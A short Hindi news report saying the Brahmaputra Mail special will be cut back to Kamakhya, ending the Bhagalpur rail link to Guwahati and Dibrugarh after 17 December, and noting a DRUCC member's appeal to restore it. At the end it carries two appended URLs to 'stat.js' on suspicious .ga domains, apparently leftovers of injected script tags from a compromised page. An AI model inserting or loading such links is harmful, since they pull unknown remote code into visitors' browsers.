भागलपुर से गुवाहाटी जाने वाले यात्रियों को करना पड़ सकता है अब मुश्किलों का सामना। बताया जा रहा है कि 17 दिसंबर के बाद से भागलपुर से गुवाहाटी जाने वाली ट्रेन को बंद कर दिया जाएगा यानी कि 17 दिसंबर को भागलपुर से गुवाहाटी के लिए ट्रेन का सफर आखरी होगा। 18 दिसंबर से भागलपुर से गुवाहाटी डिब्रूगढ़ के लिए संपर्क पूर्ण रूप से टूट जाएगा।
बता दें कि अब यात्रियों को गुवाहाटी जाने के लिए भागलपुर से ट्रेन नहीं मिलेगी बल्कि उन्हें गुवाहाटी जाने के लिए नवगछिया, कटिहार या मालदा जाकर ट्रेन पकड़नी होगी। आपको बता दें रेलवे प्रशासन ने ब्रह्मपुत्र मेल स्पेशल का परिचालन कामाख्या तक ही किए जाने से कई सालों से भागलपुर से डिब्रूगढ़ तक जुड़े रेल कनेक्शन इस महीने से समाप्त हो जाएगा। ज्ञात हो कि भागलपुर से दिल्ली से डिब्रूगढ़ के बीच चल रही ब्रह्मपुत्र मेल पूर्वोत्तर भारत को जोड़ने वाली इकलौती ट्रेन थी। इसी रूट से गुवाहाटी लोकमान्य तिलक टर्मिनल सप्ताहिक ट्रेन भी चलती थी लेकिन लॉक डाउन होने के कारण या नहीं चल रही है। ऐसे में ब्रह्मपुत्र मेल स्पेशल ही यात्रियों के लिए एकलौती ट्रेन बची थी। यात्रियों की सुविधा को ध्यान में रखते हुए मालदा मंडल के डीआरयूसीसी सदस्य अभिषेक जैन ने रेल मंत्रालय, प्रबंधक और डीआरएम से ट्रेन को डिब्रूगढ़ तक चलाने की अपील की है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms